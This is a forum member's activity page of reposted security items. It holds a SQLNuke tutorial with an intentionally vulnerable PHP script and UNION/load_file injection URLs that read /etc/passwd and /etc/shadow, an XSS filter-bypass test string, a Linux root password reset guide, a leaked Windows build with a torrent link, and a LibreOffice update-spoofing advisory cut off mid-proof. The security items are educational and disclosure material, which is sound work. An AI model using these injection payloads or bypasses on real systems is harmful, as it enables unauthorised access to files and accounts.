Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18785

  • Joined

  • Last visited

  • Days Won

    738

 Content Type 

Everything posted by Nytro

  1. Nytro
    SQLNuke – Simple but Fast MySQL Injection load_file() Fuzzer Jay Turla March 27, 2013 In SQL (Structured Query Language) Injection, there are many kinds of techniques that are partnered with UNION SELECT statements like LOAD_FILE(), INTO OUTFILE(), INFORMATION_SCHEMA, Char(), CAST(), and LIMIT. Most attackers usually take advantage of the union statements, information_schema, and the order by statements but neglecting some of the techniques just for the sake of getting the usernames and the passwords of the website administrator, just like the example below: http://localhost/sqlnuke.php?id=-1+union+select+1,concat(username,0x3a,password),3,4%20from%20accounts Below is the sample code I wrote and used for this article: <?php // Jay Turla made this script vulnerable on purpose $id = $_GET["id"]; // Open a Connection to the MySQL Server $con = mysql_connect("localhost", "username", "password"); if (!$con) { die('Could not connect to the MySQL Server ' . mysql_error()); } //Set Database mysql_select_db("database_name", $con); // SQL Query $sql= "SELECT * FROM table_name where id_number = $id"; echo "<h2>I am Vulnerable to SQL Injection </h2><br /> "; $res = mysql_query($sql); while($row = mysql_fetch_array($res)) { echo "<strong>Username:</strong> " . $row['username'] . "<br />"; echo "<strong>Password:</strong> " . $row['password'] . "<br />"; echo "<strong>Signature:</strong> " . $row['mysignature'] . "<br />"; echo "<br />"; } // Close a Connection mysql_close($con); ?> Now, let’s get to the point! In this article, let’s discuss the possible things we can do using the MySQL LOAD_FILE() function and a new tool called SQLNuke. According to w3resource, “The MySQL LOAD_FILE() reads the file and returns the file contents as a string.” To use this function, the file must be located on the host server, user must specify the full path name of the file, and user must have the FILE privilege. The file must be readable and size must be less than max_allowed_packet (set in the my.ini file) bytes. It returns NULL if the file does not exist or can’t be read.“ The syntax for this should be something like: http://localhost/sqlnuke.php?id=1+union+select+1,load_file(‘file_name/path_name’),3,4 Wait! A path name? Yes, you read that right! In that case, it’s possible that an attacker could do a directory traversal just like the Local File Inclusion (LFI) web attack. Suppose we found out the number of columns, then we should be able to execute the union select query together with the LOAD_FILE() function to achieve the attack vector. This is a kind of technique used to gather some information on the server, like concatenating the /etc/passwd, /etc/hosts, /etc/shadow and other error log files. Example: http://localhost/sqlnuke.php?id=1+union+select+1,load_file(‘/etc/passwd’),3,4 It takes a lot of time to guess the files of the server and put the path name inside the load_file() function but with SQLNuke, you speed up these problems and save more time. SQLNuke is a free and open source MySQL Injection load_file() Fuzzer written in object oriented Ruby version 1.8.7 and coded by a security researcher who goes by the handle ‘nuke99?. It is very simple to use and easy to understand. Installation and Basic Usage: To install SQLNuke, clone the SQLNuke repository to your local system with git clone https://github.com/nuke99/sqlnuke.git. Make sure that you have also installed git in order to clone SQLnuke, and Ruby in order to run it, because it is written in Ruby. If you don’t have git and Ruby, you can install these two packages by using the commands below if you are using a Debian based distro like Ubuntu, BackTrack, BackBox or Linux: sudo apt-get install git-core sudo apt-get install ruby To get started with SQLNuke, go into the SQLNuke directory with cd sqlnuke and launch it with the command ./sql.rb. Command Usage Now let’s try and hit http://localhost/sqlnuke.php?id=1+union+select+1,2,3,4 as our target. We change 2 in our target link with XxxX so that it will be overwritten with the load_file() function: root@bt:~/sqlnuke# ./sql.rb -u 'http://localhost/sqlnuke.php?id=1+union+select+1,XxxX,3,4' [!] localhost folder already exists [!] No OS selected, Continue with all the possibilities [200] - [Success] /etc/passwd [200] - [Failed] /etc/shadow [200] - [Success] /etc/group [200] - [Success] /etc/hosts [200] - [Failed] /etc/apache2/logs/access.log [200] - [Failed] /etc/httpd/access.log [200] - [Failed] /etc/init.d/apache/httpd.conf [200] - [Failed] /etc/init.d/apache2/httpd.conf [200] - [Failed] /usr/local/apache2/conf/httpd.conf [200] - [Failed] /usr/local/apache/conf/httpd.conf [200] - [Failed] /home/apache/httpd.conf [200] - [Failed] /home/apache/conf/httpd.conf [200] - [Failed] /opt/apache/conf/httpd.conf [200] - [Failed] /etc/httpd/httpd.conf [200] - [Failed] /etc/httpd/conf/httpd.conf [200] - [Failed] /etc/apache/apache.conf [200] - [Failed] /etc/apache/httpd.conf [200] - [Success] /etc/apache2/apache2.conf [200] - [Success] /etc/apache2/httpd.conf [200] - [Success] /etc/apache2/sites-available/default [200] - [Failed] /etc/apache2/vhosts.d/default_vhost.include [200] - [Failed] /var/www/vhosts/sitename/httpdocs//etc/init.d/apache [200] - [Failed] C:/wamp/bin/apache/logs/access.log [200] - [Failed] C:/wamp/bin/mysql/mysql5.5.24/wampserver.conf [200] - [Failed] C:/wamp/bin/apache/apache2.2.22/conf/httpd.conf [200] - [Failed] C:/wamp/bin/apache/apache2.2.22/conf/wampserver.conf [200] - [Failed] C:/wamp/bin/apache/apache2.2.22/conf/httpd.conf.build [+] Saved files are in 'output/localhost' As you can see in the output after running the script, it fuzzes known system information, log files and configurations for Linux and Windows. You can also use ./sql.rb -u ‘http://localhost/sqlnuke.php?id=1+union+select+1,XxxX,3,4? –os linux if the web server runs on LAMP (Linux Apache MySQL PHP/Perl/Python) so that you don’t need to fuzz on files like C:/wamp/bin/apache/logs/access.log, C:/wamp/bin/apache/apache2.2.22/conf/httpd.conf, C:/wamp/bin/apache/apache2.2.22/conf/wampserver.conf, and C:/wamp/bin/apache/apache2.2.22/conf/httpd.conf.build, which is basically for Windows that runs on a WAMP server. Files that can be looked up using the load_file() function are stored on the output/target_name directory. For example: root@bt:~/sqlnuke# cd output/localhost root@bt:~/sqlnuke/output/localhost# ls _etc_apache2_apache2.conf _etc_apache2_sites-available_default _etc_hosts _etc_apache2_httpd.conf _etc_group _etc_passwd root@bt:~/sqlnuke/output/localhost# cat _etc_hosts 127.0.0.1 localhost 127.0.1.1 bt.foo.org bt # The following lines are desirable for IPv6 capable hosts ::1 localhost ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters ff02::3 ip6-allhosts There are other known system files, configurations, and log information that need to be looked up if you want to add more files that needs to be fuzzed. To do so, you can edit the inputs/packset.lst file under the main directory of SQLNuke. As of now these are the files that are included in packset.lst: :linux: - /etc/passwd - /etc/shadow - /etc/group - /etc/hosts - /etc/apache2/logs/access.log - /etc/httpd/access.log - /etc/init.d/apache/httpd.conf - /etc/init.d/apache/httpd.conf - /etc/init.d/apache2/httpd.conf - /usr/local/apache2/conf/httpd.conf - /usr/local/apache/conf/httpd.conf - /home/apache/httpd.conf - /home/apache/conf/httpd.conf - /opt/apache/conf/httpd.conf - /etc/httpd/httpd.conf - /etc/httpd/conf/httpd.conf - /etc/apache/apache.conf - /etc/apache/httpd.conf - /etc/apache2/apache2.conf - /etc/apache2/httpd.conf - /usr/local/apache2/conf/httpd.conf - /usr/local/apache/conf/httpd.conf - /opt/apache/conf/httpd.conf - /home/apache/httpd.conf - /home/apache/conf/httpd.conf - /etc/apache2/sites-available/default - /etc/apache2/vhosts.d/default_vhost.include - /var/www/vhosts/sitename/httpdocs//etc/init.d/apache :win: - C:/wamp/bin/apache/logs/access.log - C:/wamp/bin/mysql/mysql5.5.24/wampserver.conf - C:/wamp/bin/apache/apache2.2.22/conf/httpd.conf - C:/wamp/bin/apache/apache2.2.22/conf/wampserver.conf - C:/wamp/bin/apache/apache2.2.22/conf/httpd.conf.build - C:/wamp/bin/apache/apache2.2.22/conf/httpd.conf.build Now let’s try adding /etc/tsocks.conf and /etc/pnm2ppa.conf after the line ‘/var/www/vhosts/sitename/httpdocs//etc/init.d/apache’ and before the line ‘:win:’, then launch SQLNuke with our current target: root@bt:~/sqlnuke# ./sql.rb -u 'http://localhost/sqlnuke.php?id=1+union+select+1,XxxX,3,4' --os linux [!] localhost folder already exists [!] Selected OS linux [200] - [Success] /etc/passwd [200] - [Failed] /etc/shadow [200] - [Success] /etc/group [200] - [Success] /etc/hosts [200] - [Failed] /etc/apache2/logs/access.log [200] - [Failed] /etc/httpd/access.log [200] - [Failed] /etc/init.d/apache/httpd.conf [200] - [Failed] /etc/init.d/apache2/httpd.conf [200] - [Failed] /usr/local/apache2/conf/httpd.conf [200] - [Failed] /usr/local/apache/conf/httpd.conf [200] - [Failed] /home/apache/httpd.conf [200] - [Failed] /home/apache/conf/httpd.conf [200] - [Failed] /opt/apache/conf/httpd.conf [200] - [Failed] /etc/httpd/httpd.conf [200] - [Failed] /etc/httpd/conf/httpd.conf [200] - [Failed] /etc/apache/apache.conf [200] - [Failed] /etc/apache/httpd.conf [200] - [Success] /etc/apache2/apache2.conf [200] - [Success] /etc/apache2/httpd.conf [200] - [Success] /etc/apache2/sites-available/default [200] - [Failed] /etc/apache2/vhosts.d/default_vhost.include [200] - [Failed] /var/www/vhosts/sitename/httpdocs//etc/init.d/apache [200] - [Success] /etc/tsocks.conf [200] - [Success] /etc/pnm2ppa.conf Success! The files /etc/tsocks.conf and /etc/pnm2ppa.conf have just been fuzzed and can be looked up using the load_file() function. Cool, right? Conclusion With SQLNuke, it is easier for us to look up the internal common files by using a list file which can be found under inputs/packset.lst. It is also easy to use – it fuzzes known files faster and stores the files that were found on the output directory so that you don’t need to type them on the browser. Great tool indeed! Thank you nuke99 for your contribution to the penetration testing community! I also hope to see this project mature and grow. References: http://blog.rootcon.org/2012/03/sql-injection-using-mysql-loadfile-and.html (my old article about SQL Injection Using MySQL LOAD_FILE) http://www.w3resource.com/mysql/string-functions/mysql-load_file-function.php http://nuke99.github.com/sqlnuke/ http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_load-file Sursa: http://resources.infosecinstitute.com/sqlnuke-simple-but-fast-mysql-injection-load_file-fuzzer/
  2. Nytro
    [h=1]Installing TOR On Ubuntu Linux[/h] Posted on March 20, 2013 by infodox Seeing as Ubuntu is one of the most commonly used Linux distros around, and because I cannot be bothered getting a Fedora .iso, and because these instructions work fine for Debian also, here goes! (yes, in the images I am using BT5, which is basically Ubuntu) To get your distribution name, the command “lsb_release -c” will tell you. This is important. First off, add the appropriate repository to your /etc/apt/sources.list file. Essentially this command: sudo echo “deb http://deb.torproject.org/torproject.org <DISTRIBUTION> main” >> /etc/apt/sources.list Adding TOR repo Next, we import the tor project GPG keys. I advise being root when doing this. gpg –keyserver keys.gnupg.net –recv 886DDD89 gpg –export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add - Adding GPG keys sudo apt-get update to refresh your package lists… Update Package List Now we install the torproject keyring. apt-get install deb.torproject.org-keyring Installing Keyring Install TOR itself and the Vidalia GUI… It will prompt to add a user to the group so select your username!!! apt-get install vidalia tor polipo Installing TOR Now, we check is Vidalia working OK or are we already fscked. By running it. Vidalia Works If it looks like that, you are good to go Again, as per TOR Setup – Windows | Insecurety Research , just set proxy settings in your browser to use 127.0.0.1 and 9050 as the port and you should be good to go! Next up: Installing TORbutton The observant ones will note the dates on the screenshots are old: I had originally made this guide for some friends who wanted it, and then I decided to publish it openly because, reasons. Sursa: Installing TOR On Ubuntu Linux | Insecurety Research
  3. Nytro
    [h=1]Richard Stallman says Ubuntu Linux is 'spyware'[/h]Asks South American free software association not to promote it at events By Egan Orion Mon Mar 25 2013, 12:49 FREE SOFTWARE PIONEER Richard Stallman has asked a South American free software association not to promote Ubuntu Linux at its events because it "spies on its users" by collecting its users' desktop search activity and selling the data to Amazon. Canonical released Ubuntu 12.10 last October with Amazon search integrated into its Dash desktop search function. Although Ubuntu users can opt out and Canonical claims it anonymises users' search information before sending it to Amazon, the change resulted in Ubuntu users being shown Amazon ads in response to desktop search queries. The 'feature' has attracted a lot of criticism and might have led some users to defect to other Linux distributions. When Stallman's request was denied by the FLISOL event organiser with the excuse that it would limit user freedom of choice, Stallman fired off a response to the organisation's entire mailing list on Sunday. Parts of his email are quoted below, as translated by Groklaw. "The issue I raise is about what should happen at FLISOL events. Give away copies of Ubuntu or not? Promote Ubuntu or no? I asked the organisers of the event that they, as a policy, not distribute or promote Ubuntu. "Freedom of users is something else, and there isn't a conflict between a user's freedom and my request. If someone decides to install Ubuntu, I would consider it a mistake, but it's his own choice to do it. What I ask is that you don't participate, help or suggest that he do it. I didn't request that you block him from doing so. "As a matter of principle, I don't believe anyone has a right, morally, to distribute proprietary software, that is, software that deprives the users of freedom. When the user controls his own software, he can install what he wants and no one can stop him. But today's issue isn't about him, what he does, but rather what you do with him." As Stallman sent his email only yesterday, it's not yet known whether FLISOL has reconsidered promoting Ubuntu at its free software events. These points might seem like splitting hairs, but apparently Richard Stallman - the author of the GNU General Public Licence (GPL), as well as the founder and president of the Free Software Foundation - is serious about them. Sursa: Richard Stallman says Ubuntu Linux is 'spyware'- The Inquirer
  4. Nytro

    Blog RST

    Nytro replied to Nytro's topic in Anunturi importante

    Multumim Gecko, acum si blogul este verde.
  5. Nytro
    Astia carora le apare eroarea, spuneti si ce NU E OK. Vedeti daca sunt fix 20 de topicuri, daca toate au titlu si daca la toate apare categoria si autorul. La care nu apare, spuneti-mi si mie. Ca asa eroarea in sine nu ajuta la nimic.
  6. Nytro
    Pula mea, le-am mai colorat putin, nu ma pricep. Partea cu chat-u se poate pune, doar sa creez iframe la click pe buton, ca daca nu, o sa "se logheze" pe chat, toti care intra pe homepage. Iar cu AJAX-ul e mai nasol, ca unele chestii le iau cu external.php iar ultimele posturi le citesc eu manual din DB. O sa vad ce e de facut, doar ca diseara e meciu, deci probabil pauza "features"
  7. Nytro
    Pentru tema am primit ceva "verde" de la Gecko. Legat de search merge, dar cred ca cel de la vBulletin e cel mai ok.
  8. Nytro
    1. O sa pun fontul mai mic, sa vedem cum iese 2. O sa scot formele patratoase daca arata mai bine rotunjite 3. Verific momentan doar daca daca e bifat "show avatar" nu si daca exista, o sa rezolv, sper 4. Link-urile mai deschise la culoare si toate sa aiba target="_blank" desi posturile/stirile au deja 5. Legat de chat, pare ok, o sa ma uit. 6. Legat de AJAX, eu ma gandisem la ceva elegant, care sa adauge doar posturile noi, nu sa faca un refresh la toate ultimele posturi, ultimele stiri... Dar e o versiune simpla si acceptabila. Tema e asta: WordPress > deCoder De preferat sa ramana tot asa, gradient.
  9. Nytro
    Vreti prea multe Cand am timp o sa mai fac cateva modificari: 1. Font-ul era cam mare, asa mi s-a parut, de aceea am scos linia 2. O sa pun chestiile alea sa nu mai fie asa patratos 3. O sa verific de ce nu merg imaginile de profil la unii utilizatori 4. O sa deschid link-urile la culoare 5. Chatul nu prea vad unde sa il pun, e prea mare el in sine pentru a fi bagat pe acolo Probabil nu o sa fac update "real-time" cu AJAX la topicuri si posturi pentru ca o sa imi ia ceva timp si nu prea am. Legat de BLOG, da, aveam de gand sa il fac din albastru verde insa nu stiu daca o sa imi iasa. Se ofera cineva sa faca blog-ul VERDE?
  10. Nytro
    Encrypt your harddisk.
  11. Nytro
    Reset Linux root password without knowing the password -By Vaibhav Kaushal So there it goes - Linux is a secure OS. No, really it is. Despite the title of this post, Linux is actually a secure system. Before we proceed to the main topic, let us consider a few points: Linux is flexible to a very large extent. Linux's administrator account is called 'root'. Linux systems never deny access to any resource whatsoever to the root account. If there are any restrictions in place, the root can remove those as well. The root account can set and change the password of any user. To change the password of root, you need to first login as root! It is the 5th point where the problem is. Much like in Windows, you would get locked out of the system. But since Linux is not (as pathetic as) Windows, there are ways to work around it. Let us see some of them. Method 1 - Use 'sudo su' In many systems, a normal user which is added to the system is also added to the list of sudoers. These users can gain the power of root account by running a command prepended with the word sudo. So if the person passes sudo passwd root or passes sudo su to first get the root power and then run the passwd command, he or she would be able to reset the root password. Simple. Easy. Effective. But this does not work everywhere Method 2 - recovery mode The sudo su method works on many systems, but not all. It would work on Ubuntu systems most of the time but other distributions like OpenSUSE, Fedora, Sabayon etc. may not be able to use it because they either do not put the normal users in the list of suoders or they want the password of root (not the same normal account) to give root power. On such systems, one can use the recovery console to reset root password. To do so, one can select 'recovery menu' in the boot menu. Normally every Linux distribution that gets installed will install a 'recovery mode' or a 'failsafe mode' boot entry which allows the user to boot into runlevel 1 where only the root can login. The user can then pass the command passwd to reset the password. Method 3 - override the init file! The recovery mode thing cannot work always because many systems (or should I say 'most' systems) will ask for the root password for logging in. Now, since you do not know the root password in the first place, that trick will fail. In such a case, you can try this: In the boot menu, highlight your Linux menu entry (not the one for recovery mode, but for the normal one) and press 'e' key on the keyboard. This will start an editor where you can change the boot parameter. In most new Linux systems, Grub2 comes as the boot loader. In such systems, the boot menu entry would be a bit complicated. So you might get intimidated by what you see at first. Do not worry, search for the line which starts with the word 'linux'. It would look something like this: linux /boot/vmlinuz-3.7.10-1.1-desktop root=UUID=ba08039b-33ba-4074-857c-9688856c3583 video=1366x768 resume=/dev/disk/by-id/ata-WDC_WD3200BEVT-75ZCT2_WD-WXE1A9033884-part2 splash=silent quiet showopts You have to add this to the end of that line: init=/bin/bash. So the line will start looking like this: linux /boot/vmlinuz-3.7.10-1.1-desktop root=UUID=ba08039b-33ba-4074-857c-9688856c3583 video=1366x768 resume=/dev/disk/by-id/ata-WDC_WD3200BEVT-75ZCT2_WD-WXE1A9033884-part2 splash=silent quiet showopts init=/bin/bash Now press the F10 button (or whatever is being shown on the screen for the booting) to boot the system. NOTE: If you do not have Grub2, but a lower version of grub then you should search for the line starting with the word 'kernel' instead of 'linux'. Also, you would have to press the 'b' key to boot the entry in that case. When you boot like that, you would be given the root prompt. You can then run the command passwd root to change the root password. The reason why this happens is because normally when a Linux system boots, the kernel is loaded first. After the kernel is loaded, it loads the ramdisk and gets ready for continuing the rest of the booting. Once it is ready, it runs the init command (usually located at /sbin/init) which would run the rest of the system. When you pass init=/bin/bash to the kernel, it will not load /sbin/init file for booting; instead it will load /bin/bash file which starts the bash shell with the root user's power (because the kernel itself called it) and hence that prompt would allow you to change the root user's password. Actually, this prompt had more power than anything else on Linux because it is running with all the privileges of the system! Method 4 - the ultimate method - change the password hash If none of the above works for you then you can take help of another Live Linux CD/DVD to change the root password. This method is long and is a step by step process. You should follow it carefully. Here are the steps (we will consider that the installed system was OpenSUSE and the Live DVD was that of Ubuntu): Boot into the Live Linux system (Ubuntu) using the DVD. Once the system is up, go to the terminal and type 'sudo su'. This will get you to the root user. Now, mount the partition of the disk which contains the /etc directory of the installed system (i.e. the root partition of the OpenSUSE installation on disk). Usually, it would be /dev/sda1 or /dev/sda2 etc. You would know it better. Assuming it was on /dev/sda2, run the command: mkdir /tmpmnt mount /dev/sda2 /tmpmnt Above command will mount your installed system's root partition on /tmpmnt directory of the live system. Now you run the command: 'passwd root'. It will ask for password twice. Enter the password and remember the password well! Open the file /etc/shadow of live system (use vim or nano) and search for the line which begins with the word 'root'. It will look something like this: root:$6$o9LWR1MJXjmO$IRP3uil/aSsDVR/HoCqXvTMUbp9.91z58MkiZSoHfFv3AuB54xQetmTP6E9Y6k2Wku80O9wbjcXC24kl6zKUz/:15609:::::: Now, the gibberish you see after the first colon is your password hash. Copy that hash. (In this case, the hash is $6$o9LWR1MJXjmO$IRP3uil/aSsDVR/HoCqXvTMUbp9.91z58MkiZSoHfFv3AuB54xQetmTP6E9Y6k2Wku80O9wbjcXC24kl6zKUz/ Open the /tmpmnt/etc/shadow file and search for the line that begins with 'root'. It will look very much similar to what you saw in step 6. Replace the existing hash in this file (/tmpmnt/etc/shadow) with the one you have copied (from /etc/shadow); i.e. you have to delete the existing text after the first colon in the file /tmpmnt/etc/shadow and paste the copied hash there! Save the file and reboot the system to the installation on the disk. Try to login as root and use the password as what you had used in step 5. You should be able to login! Viola, you have successfully changed the password! The last trick is the master trick of them all. If none of the steps work for you (try them in the order they have been mentioned), please let us know what issues you are facing in the comments. OR you can register at the site and ask specific questions in the forums. Sursa: Reset Linux root password without knowing the password
  12. Nytro
    Am pus 2px intre <li>-uri. In afara de micile detalii care difera de la om la om, ca functionalitate, ce ati vrea sa mai apara pe acolo?
  13. Nytro
    Veniti si cu sugestii pentru fonturi. PS: Daca veniti cu un font valid de "Microsoft Windows TrueType Font CVE-2012-4786 Remote Code Execution Vulnerability" aveti o sticla de whiskey de la mine :->
  14. Nytro
    Avem, dupa secole, un nou homepage: https://rstforums.com/ Multumim Gecko pentru design! Asteptam sugestii atat legate de functionalitate cat si de design. Speram sa nu fie probleme.
  15. Nytro
    "><script>alert('TEST');</sc<!--Z-->ipt>
  16. Nytro
  17. Nytro
    [h=1]Public Key Cryptography: RSA Encryption Algorithm[/h] RSA Public Key Encryption Algorithm (cryptography). How & why it works. Introduces Euler's Theorem, Euler's Phi function, prime factorization, modular exponentiation & time complexity.
  18. Nytro
    Nu l-am putut instala pe VMWare, dadea BSOD pe HAL (Hardware Abstraction Layer) initializer. O sa incerc si VirtualBox. L-a incercat cineva? Pareri? Ce e nou?
  19. Nytro
    [h=1]Windows Blue, Build 9364 leaked[/h]March 24, 2013 by ankur We have just got an exclusive news from our sources that that Windows Blue Build 9364 which probably belongs to Milestone 1 has been leaked and is available for download somewhere on internet. This is the first build to be leaked after Windows 8 was released by Microsoft. Here are the details of the build- Name: 9364.0.FBL_PARTNER_OUT13.130315-2105_X86FRE_CLIENT_EN-US-IMP_CCSA_DV5.ISO Size: 2,63 GB HASH: 179B588DFC21CCF4B76B7E9BE505A51D00F52D6F Currently only 32 bit version has been leaked. Here is the screenshot of this build- Torrent: magnet:?xt=urn:btih:98C4A6164F91792B9D575E2260CFBC53DBA22D72&dn=9364.0.FBL_PARTNER_OUT13.130315-2105_X86FRE_CLIENT_EN-US-IMP_CCSA_DV5.ISO&tr=udp%3a%2f%2ftracker.publicbt.com%3a80%2fannounce&tr=udp%3a%2f%2ftracker.ccc.de%3a80%2fannounce&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80%2fannounce Link direct: https://rstforums.com/WindowsBlue.iso Sursa: Windows Blue, Build 9364 leaked | Windows 9 Beta
  20. Nytro
    Stream Armor Stream Armor is the sophisticated tool to discover Hidden Alternate Data Streams (ADS) and clean them completely from your system. It's advanced auto analysis coupled with Online Threat Verification mechanism makes it the best tool available in the market for eradicating the evil streams. [TABLE] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [/TABLE] It comes with fast multi threaded ADS scanner which can recursively scan over entire system and quickly uncover all hidden streams. All such discovered streams are represented using specific color patten based on threat level which makes it easy for human eye to distinguish between suspicious and normal streams. It has built-in Advanced File Type Detection mechanism which examines the content of file to accurately detect the file type of stream. This makes it great tool in Forensic Analysis in uncovering hidden documents/images/audio/video/database/archive files within the alternate data streams. It is fully Portable software which can be directly run anywhere without installing locally. It works on wide range of platforms starting from Windows XP to Windows 8. [TABLE] [TR] [TD=class: page_subheader]What is Alternate Data Stream (ADS) ?[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]Alternate Data Stream (ADS) is the lesser known feature of Windows NTFS file system which provides the ability to put data into existing files and folders without affecting their functionality and size. Any such stream associated with file/folder is not visible when viewed through conventional utilities such as Windows Explorer or DIR command or any other file browser tools. It is used legitimately by Windows and other applications to store additional information (for example summary information) for the file. Even 'Internet Explorer' adds the stream named 'Zone.Identifier' to every file downloaded from the internet. Due to this hidden nature of ADS, hackers have been exploiting this method to secretly store their Rootkit components on the compromised system without being detected. For example, the infamous Rootkit named 'Mailbot.AZ' aka 'Backdoor.Rustock.A' used to hide its driver file into system32 folder (C:\Windows\system32) as a stream '18467'. In short, ADS provides easy way to store the malicious content covertly as well as execute it directly without making even a bit of noise. Only sophisticated tools such as StreamArmor has the ability to discover and destroy these hidden malicious streams. For complete details on 'Alternate Data Streams' please refer to the following article, 'Exploring Alternate Data Streams' [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_subheader]Features [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Fast, multi threaded ADS scanner to quickly and recursively scan entire computer or drive or just a folder. 'Snapshot View' for quick identification of selected stream and faster manual analysis. Option to 'Ignore Known and Zero Streams' which automatically ignores all known streams (such as Zone.Identifier) and streams with zero size, thus greatly reducing time and effort involved in manual analysis. Advanced stream file type detection which analyzes internal content of file to detect the real file type rather than just going by the file extension. Here is the list of some of the major file type categories detected by StreamArmor Executable File Type (EXE, DLL, SYS, COM, MSI, CLASS) Archive File Type (ZIP, RAR, TAR, GZ, COM) Audio File Type (MP3, WAV, RA, RM, WMA, M3U) Video File Type (WMV, AVI, MPEG, MP4, SWF, DIVX, FLV, DAT, VOB, MOV) Database Type (MS ACCESS) Document Type (PDF, XML, DOC, RTF, All MS Office old & new formats) [*]Sophisticated 'Auto Threat Analysis' based on heuristic technology for identifying anomaly in the discovered streams based on the characteristics and patterns. [*]'Online Threat Verification' to check for presence of Virus or Rootkit in the suspicious stream using any of the following prominent online websites. VirusTotal (www.VirusTotal.com) ThreatExpert (ThreatExpert - Automated Threat Analysis) MalwareHash (Malware Hashes Database - MalwareHash) [*]Representation of streams using color pattern based on threat level makes it easy and fast for human eye to distinguish between suspicious streams from normal ones. [*]Parallel analysis of discovered streams during the scanning process, allows user to start with analysis immediately without waiting for entire scanning operation to be completed. [*]View the entire content of selected stream using the configured third party application. In fact user can configure different applications for normal & executable stream file. [*]Save the selected stream file content to a disk, or USB drive or DVD for further analysis. [*]Delete the selected alternate data stream from its base file or folder. [*]Execute/Run the selected executable stream file for analyzing its malicious nature in virtual environments such as VMWare. [*]Dynamic performance tuning mechanism by adjusting the ADS scan thread count [only for advanced users]. [*]Sort feature to arrange the scanned streams based on its name/threat level/content type/size. [*]Export the entire list of discovered streams to a disk file in HTML format for offline analysis. [/TD] [/TR] [/TABLE] Download: http://securityxploded.com/download.php#streamarmor Sursa: Stream Armor : Advanced Tool to Scan & Clean Malicious Alternate Data Streams (ADS) | www.SecurityXploded.com
  21. Nytro
    [h=1]Microsoft releases Skype transparency report under pressure from privacy groups[/h]by James Dohnert Microsoft has released details of the number of requests for user data made by law enforcement in 2012. The report comes following calls for transparency from online privacy advocates. According to the report, Microsoft and Skype received more than 75,000 requests for data last year. Redmond says the requests potentially affected 137,424 user accounts. "We are providing information on the criminal law enforcement requests we receive for customer data," wrote Microsoft in a blog post. "Like others in the industry, we believe it is important for the public to have access to information about law enforcement access to customer data, particularly as customers are increasingly using technology to communicate and store private information." Microsoft's transparency report comes following similar releases from the likes of Google and Twitter. Google released its latest report earlier this month, while Twitter launched its data request logs in January. Earlier this, 44 privacy groups pushed Microsoft to disclose information on law enforcement requests for Skype user data. Skype was acquired by Microsoft in 2011. Up until recently the firm did not report law enforcement requests for Skype user data in its transparency report. According to the report, Microsoft disclosed customer content to law enforcement agencies about two percent of the time. The report also shows that the firm disclosed non-content information about 79 percent of the time. Microsoft defines non-content information as basic user data such as last used IP address, customer names, and login names. Content information is considered data such as cloud stored documents and email text. Along with general disclosure data, Microsoft also released information on requests made by National Security Letters (NSLs). The letters are requests for non-content data that does not require a court order. Redmond is only allowed to share ballpark figures for the NSLs disclosures. The report finds that Microsoft received up to 999 NSL requests in 2012. Until recently no information on NSL letters were allowed to be disclosed in transparency reports. Sursa: Microsoft releases Skype transparency report under pressure from privacy groups - IT News from V3.co.uk
  22. Nytro
    LibreOffice 4.0.1.2 Update Spoofing Authored by Janek Vind aka waraxe | Site waraxe.us LibreOffice version 4.0.1.2 suffers from an update spoofing vulnerability due to not using a secure channel nor digital signatures. [waraxe-2013-SA#099] - Update Spoofing Vulnerability in LibreOffice 4.0.1.2 =============================================================================== Author: Janek Vind "waraxe" Date: 21. March 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-99.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ LibreOffice is a free and open source office suite, developed by The Document Foundation. It is descended from OpenOffice.org, from which it was forked in 2010. The LibreOffice suite includes a word processor, spreadsheet, graphics editor, slideshow creator, database and math formula writer. http://www.libreoffice.org/ Affected are versions 3.5.1 to newest 4.0.1.2, older versions were not tested. ############################################################################### 1. Update Spoofing Vulnerability ############################################################################### It appears, that current version of LibreOffice contains security vulnerability in update mechanism, which can be exploited by malicious people to conduct spoofing attacks. When checking for updates, LibreOffice issues GET request over HTTP: GET /check.php HTTP/1.1 Connection: TE, close TE: trailers Host: update.libreoffice.org Accept-Encoding: gzip Pragma: no-cache Accept-Language: en-US User-Agent: LibreOffice 4.0 .0.3 (7545bee9c2a0782548772a21bc84a9dcc583b89; Windows; x86; BundledLanguages=en-US af am ar as ast be bg bn bn-IN bo ...) Server at "update.libreoffice.org" responds with XML data: <?xml version="1.0" encoding="utf-8"?> <inst:description xmlns:inst="http://update.libreoffice.org/description"> <inst:id>LibreOffice 4.0.1</inst:id> <inst:gitid>84102822e3d61eb989ddd325abf1ac077904985</inst:gitid> <inst:os>Windows</inst:os> <inst:arch>x86</inst:arch> <inst:version>4.0.1</inst:version> <inst:buildid>9999</inst:buildid> <inst:update type="text/html" src="http://www.libreoffice.org/download/" /> </inst:description> LibreOffice user can click "Download" and "Install" buttons and LibreOffice will download and install the update. Such update mechanism contains two security flaws: 1. Update check is done over unencrypted HTTP channel. Malicious third party is able to conduct Man-in-the-Middle (MitM) attacks and spoof server response. In this way it is possible to instruct LibreOffice to download malicious update. 2. LibreOffice will execute downloaded update without digital signature verification. Testing: tests were done using Windows 7, Apache and PHP. Steps: 1. modify "windows/system32/drivers/etc/hosts" file in order to emulate DNS spoofing: 127.0.0.1 update.libreoffice.org 2. create php file "check.php" to the webserver main directory: <?php echo '<?xml version="1.0" encoding="utf-8"?> <inst:description xmlns:inst="http://update.libreoffice.org/description"> <inst:id>LibreOffice 5.6.7</inst:id> <inst:gitid>123456789</inst:gitid> <inst:os>Windows</inst:os> <inst:arch>x86</inst:arch> <inst:version>5.6.7</inst:version> <inst:buildid>9999</inst:buildid> <inst:update type="application/octet-stream" 